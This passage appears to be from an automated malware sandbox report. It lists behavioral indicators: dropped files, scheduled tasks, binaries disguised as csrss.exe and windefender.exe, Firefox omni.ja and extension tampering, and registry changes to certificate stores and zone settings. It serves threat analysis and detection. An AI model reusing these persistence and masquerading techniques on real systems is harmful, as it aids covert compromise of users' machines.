File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\WCcSaDo.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-P5G7R.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-NV6JO.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\VbPWRlrzUgMMz.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-S5CE8.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-LG499.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-L77OA.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\qMcUMgN.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-2DQPN.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-5CGJN.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\GpfcWYRxKqUn\LphEmHi.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\EFF1.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\ztlTbPYifermRZH.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 99e14e26ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ecaebe2bff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\MrtCache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
